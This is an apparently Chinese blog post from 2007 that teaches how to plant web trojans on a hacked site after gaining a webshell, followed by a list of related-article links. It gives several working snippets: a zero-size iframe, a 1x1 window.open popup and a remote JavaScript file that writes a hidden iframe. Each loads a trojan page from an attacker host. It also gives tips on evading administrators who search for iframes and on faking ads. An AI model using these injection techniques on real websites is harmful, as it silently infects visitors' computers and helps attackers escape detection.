教你如何挂马

原创 2007年10月09日 18:55:00

教你如何挂马

方法一:

一般在你入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 :
<html>
<iframe src="http://192.168.1.3/inc/joke.htm" width="0" height="0" frameborder="0"></iframe>
</html>

把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>
http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。

方法二:

<SCRIPT language=javascript>   
window.open("http://192.168.1.3/inc/joke.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1"); 
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的木马页是满屏显示的
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了,flash木马也很厉害的哦。

方法三:

还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe height=0 width=0 src=’
http://192.168.1.3/inc/joke.htm’ name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............

方法四:
代码加进包含文件<!--#include file="conn.asp"-->

 

织梦DedeCMS被挂马解决方案

使用织梦DedeCMS的朋友,一直有一个头疼的问题,就是织梦DedeCMS的安全性。No牛网在以前的很多文章中,都有对织梦安全的相关说明,这些织梦安全设置的文章,一般都是针对没有被挂马的情况。如果自己...
  • qq1547479934
  • qq1547479934
  • 2016年01月21日 13:15
  • 501

常见JS挂马方法及如何防止网站被黑客挂马?

最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定。可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因。最后发现是网站被挂马了,导致网站被连累了。在此,借助seo思维博客的平台...
  • z10160
  • z10160
  • 2013年09月22日 08:02
  • 2191

服务器被挂马的一般解决方法

服务器被挂马的原因很多,在解决之前,首先要弄清楚被挂马的类型,比较常见的分为ARP挂马和非ARP挂马。先说说ARP挂马吧,机房中了ARP的木马,刚接触到的朋友会觉得很神奇,在服务器上看网站程序都没有被...
  • forest_fire
  • forest_fire
  • 2016年03月21日 11:05
  • 1665

Android WebView挂马漏洞--各大厂商纷纷落马

一、漏洞描述     近期,微信等多款安卓流行应用曝出高危挂马漏洞:只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件、向好友发送欺诈短信、通...
  • clh604
  • clh604
  • 2014年01月17日 23:41
  • 1059

网站挂马方法大全

一:框架挂马 二:js文件挂马 首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为 三:js变形加密 muma...
  • u013035751
  • u013035751
  • 2013年12月09日 20:03
  • 1806

VBS清除全盘网页文件被挂马代码【VBS专杀】

由于有些病毒很恶心的感染了全盘文件, 感染exe还不说,还感染网页文件,真的极度变态恶心啊!杀毒软件清除exe文件还好,但是网页文件会被直接删除掉,好吧,自己动手,丰衣足食。用vbs写了这个脚本。 ...
  • u010038480
  • u010038480
  • 2013年05月25日 22:19
  • 548

寻找PHP(网站)挂马,后门

一 php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代...
  • MiltonZhong
  • MiltonZhong
  • 2013年08月02日 15:29
  • 2639

PHP网站被挂马防御战

最近把几个PHP网站的程序备份到本地,准备与本地的发布版的svn做内容整合。发现有一些non-versioned的程序文件,仔细查看,是一些木马程序。 我在本地测试了这些木马程序,可以读取所有硬盘的文...
  • cwqcwk1
  • cwqcwk1
  • 2013年06月03日 11:15
  • 2277

网页病毒挂马原理解析

所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webs...
  • bing_JavaScript
  • bing_JavaScript
  • 2016年05月05日 14:30
  • 878

ECMS清除挂马以及后台升级实战(从ecms6.6~ecms7.0)

当时状况 Windows Server 2008 R2 Enterprise + 帝国CMS6.6 + MySql   服务器软件: Microsoft-IIS/7.5...
  • zurich1979
  • zurich1979
  • 2014年05月30日 16:13
  • 2389
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:教你如何挂马
举报原因:
原因补充:

(最多只允许输入30个字)